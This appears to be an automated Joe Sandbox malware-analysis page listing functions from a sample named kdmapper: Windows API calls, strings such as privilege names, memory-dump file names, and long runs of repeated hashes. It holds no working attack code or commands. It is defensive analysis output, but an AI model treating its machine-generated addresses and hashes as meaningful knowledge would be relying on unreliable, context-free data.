Instruction ID: bff9f33e5045128fc51d6a587e5fa5ecd28a056f261bb2afd47804da6d038e74
Opcode Fuzzy Hash: c474613d497b8e0d0dd6170ff0824ca76cd4e172d2e406d27ff5ec094daa97ef
Instruction Fuzzy Hash: 4FB012E125C110BC314461041D02C37028FC0C0F21B30C12EF905E51C0D8420D0F06B3

Function 0063E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c5c56fa882dbc029aad3429fd62f572ad3af21817f4d3082db13689e8f0e8b77
Instruction ID: 84b86a1eea6a834cea224b567b07fb1dcd676de79e2b86f8b6427f246e231a28
Opcode Fuzzy Hash: c5c56fa882dbc029aad3429fd62f572ad3af21817f4d3082db13689e8f0e8b77
Instruction Fuzzy Hash: DDA011E22A8202BC300822002C02C3B028FC0C0B2AB30802EF822A00C0AC82080A08B2

Function 0063E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b16020762d5cb71354aa08042c86783c5cc0e3f48ae05382d8b79c27715be8e2
Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
Opcode Fuzzy Hash: b16020762d5cb71354aa08042c86783c5cc0e3f48ae05382d8b79c27715be8e2
Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2

Function 0063E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: feefb718577018a75243e74707f80cef145f3e7e944f38d9e92e6bd47ab80d0a
Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
Opcode Fuzzy Hash: feefb718577018a75243e74707f80cef145f3e7e944f38d9e92e6bd47ab80d0a
Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2

Function 0063E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 795f566f1c3a0b9a055c246ec7d2655cff255027834d65f3dd170708a1880a2f
Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
Opcode Fuzzy Hash: 795f566f1c3a0b9a055c246ec7d2655cff255027834d65f3dd170708a1880a2f
Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2

Function 0063E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6316eb9a53c361bf8e2301ec0769d9d6a7c4801fb0b0c363c420aa11f3d5305f
Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
Opcode Fuzzy Hash: 6316eb9a53c361bf8e2301ec0769d9d6a7c4801fb0b0c363c420aa11f3d5305f
Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2

Function 0063E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2090ec61f9510aa38bae2182e588fa663d865c4766480c59882877c61c163d2d
Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
Opcode Fuzzy Hash: 2090ec61f9510aa38bae2182e588fa663d865c4766480c59882877c61c163d2d
Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2

Function 00629F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0062903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00629F0C

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: bb82dc71e6543764456a1624675de3eafd27be86da5774306edcbcc7969b6a61
Instruction ID: 58bef72e28d6470569549ff6e68aaa74ed965a5b21097a6f3cc623a76ff06b8e
Opcode Fuzzy Hash: bb82dc71e6543764456a1624675de3eafd27be86da5774306edcbcc7969b6a61
Instruction Fuzzy Hash: 09A01230040119468E001730C90400D3711E710BC170011945006CA0A1C71244078700

Function 0063AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0063AE72,C:\Users\user\Desktop,00000000,0066946A,00000006), ref: 0063AC08

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 83c2f1b0716bed9057633077f57bebcc8959a81fc086bb132e09a74a567feec9
Instruction ID: 0deac74f18e94e20b4508ecf68a2347d657ef88ac4e70a3d7527105f1577080e
Opcode Fuzzy Hash: 83c2f1b0716bed9057633077f57bebcc8959a81fc086bb132e09a74a567feec9
Instruction Fuzzy Hash: B7A011302002008B83008B328F0AA0EBAAAAFA2B82F00C028A00080230CB30C820AA00

Function 00629620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,006295D6,?,?,?,?,?,00652641,000000FF), ref: 0062963B

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 36eb7598cd062712514589008d15684865237b67baeb1abcacc57c772461ded9
Instruction ID: 2156b7f1250a9446727303115ab6ab1fbe3a0d3442c99b2b24a51653f98b791c
Opcode Fuzzy Hash: 36eb7598cd062712514589008d15684865237b67baeb1abcacc57c772461ded9
Instruction Fuzzy Hash: 8DF0E930081F259FEB308A20D4587D277EA6B52321F042B1ED0E242AE0D761658DDF50

Non-executed Functions

Function 0063C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0063C2B1
EndDialog.USER32(?,00000006), ref: 0063C2C4
GetDlgItem.USER32(?,0000006C), ref: 0063C2E0
SetFocus.USER32(00000000), ref: 0063C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0063C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0063C358
FindFirstFileW.KERNEL32(?,?), ref: 0063C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0063C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0063C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0063C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0063C3D4
_swprintf.LIBCMT ref: 0063C404

Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0063C417
FindClose.KERNEL32(00000000), ref: 0063C41E
_swprintf.LIBCMT ref: 0063C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0063C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0063C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0063C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0063C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0063C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0063C509
_swprintf.LIBCMT ref: 0063C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0063C548
_swprintf.LIBCMT ref: 0063C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0063C5AF

Part of subcall function 0063AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0063AF35
Part of subcall function 0063AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0065E72C,?,?), ref: 0063AF84

Strings

%s %s %s, xrefs: 0063C3F2, 0063C527
REPLACEFILEDLG, xrefs: 0063C247
%s %s, xrefs: 0063C469, 0063C58E
Pc, xrefs: 0063C342

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$Pc$REPLACEFILEDLG
API String ID: 797121971-948700689
Opcode ID: 61bcf451bd86a3fc329cd0da13e23302eb6f28cdec13748570ac9cd89e85bce2
Instruction ID: 43c66876fbf60832e177f6e4b13a50e55a903cbfa0585ca67d54aba4ebd62406
Opcode Fuzzy Hash: 61bcf451bd86a3fc329cd0da13e23302eb6f28cdec13748570ac9cd89e85bce2
Instruction Fuzzy Hash: C491A472148354BBD331DBA0DC49FFB77AEEB8AB50F004919F789D6181DB71A6048B62

Function 0063F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0063F844
IsDebuggerPresent.KERNEL32 ref: 0063F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0063F930
UnhandledExceptionFilter.KERNEL32(?), ref: 0063F93A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: be1a70f5b72a1315739730467fba5434ec8a9d9ff38475f5bc3b3ba7d36bd0de
Instruction ID: 3f41843db7a49a1a3c3ed521b41facd07192cf9f0fc8a66e8b8450e032d75b1f
Opcode Fuzzy Hash: be1a70f5b72a1315739730467fba5434ec8a9d9ff38475f5bc3b3ba7d36bd0de
Instruction Fuzzy Hash: B4311675D0531D9BDB61DFA4D989BCCBBB8AF08705F1040AAE40DAB390EB719B848F44

Function 0063E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,0063E5E8,0000001C,0063E7DD,00000000,?,?,?,?,?,?,?,0063E5E8,00000004,00681CEC,0063E86D), ref: 0063E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0063E5E8,00000004,00681CEC,0063E86D), ref: 0063E6CF

Strings

D, xrefs: 0063E6C3

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: a6d3295eadbd782048ab97a9cf7c5d58f4cafa2a8643a7c67aa5c8cfa96271c4
Instruction ID: 14f81e66f6fc879679ef2224a7f4896e5c2ff0a5b843fb3bb89f073d24f7e148
Opcode Fuzzy Hash: a6d3295eadbd782048ab97a9cf7c5d58f4cafa2a8643a7c67aa5c8cfa96271c4
Instruction Fuzzy Hash: 0901D432A002096BDB24DE29DC49BDD7BAAAFC4324F0CC120ED19DA390DA35DD05C690

Function 00626C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00626DDF,00000000,00000400), ref: 00626C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00626C95

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 185b18d575a880f7146742d5f418f442b6b159051808e4ba4c82e2433eab59af
Instruction ID: 2a6d767b4c6bc571858ad30995de7b36b592dd56ddc215c2462676d23d07105f
Opcode Fuzzy Hash: 185b18d575a880f7146742d5f418f442b6b159051808e4ba4c82e2433eab59af
Instruction Fuzzy Hash: F7D0A730344310BFFB011F219C06F1B3B5ABF40F82F14C0047740D40E0C6708810AB15

Function 0063F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0063F66A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 11ccb593372ad40f5b3da1cb4239883c845db17b24d701d6eb9def60a4f12f2a
Instruction ID: 8c1b1434556834df55901444420cab120dfde90e932fc5cf70b9a854c95fd4ec
Opcode Fuzzy Hash: 11ccb593372ad40f5b3da1cb4239883c845db17b24d701d6eb9def60a4f12f2a
Instruction Fuzzy Hash: 1B517FB1D006199FEB28CF54E9857AABBF6FB48314F24953AD411EB350D375E901CB90

Function 0062B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0062B16B

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 612fc00cf9a775b5183cb394a8ca5be26bf010af795b993af5948b327b50239f
Instruction ID: c539629fbd3ff4be7831453a0f3eb5536b672317be74bf19a8cc705675f0fc3c
Opcode Fuzzy Hash: 612fc00cf9a775b5183cb394a8ca5be26bf010af795b993af5948b327b50239f
Instruction Fuzzy Hash: 25F09AB4E006588FCF18CF18EC966DA33F3FB99305F145295D50693390C7B0AA84CE61

Function 00626FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00626FAA
_wcslen.LIBCMT ref: 00627013
_wcslen.LIBCMT ref: 00627084

Part of subcall function 00627A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00627AAB
Part of subcall function 00627A9C: GetLastError.KERNEL32 ref: 00627AF1
Part of subcall function 00627A9C: CloseHandle.KERNEL32(?), ref: 00627B00

Part of subcall function 0062A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0062977F,?,?,006295CF,?,?,?,?,?,00652641,000000FF), ref: 0062A1F1
Part of subcall function 0062A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0062977F,?,?,006295CF,?,?,?,?,?,00652641), ref: 0062A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00627139
CloseHandle.KERNEL32(00000000), ref: 00627155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00627298

Part of subcall function 00629DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,006273BC,?,?,?,00000000), ref: 00629DBC
Part of subcall function 00629DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00629E70

Part of subcall function 00629620: CloseHandle.KERNELBASE(000000FF,?,?,006295D6,?,?,?,?,?,00652641,000000FF), ref: 0062963B

Part of subcall function 0062A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A501
Part of subcall function 0062A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A532

Strings

SeRestorePrivilege, xrefs: 00626FC2
UNC\, xrefs: 00627051
\??\, xrefs: 0062702B
SeCreateSymbolicLinkPrivilege, xrefs: 00626FCC

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

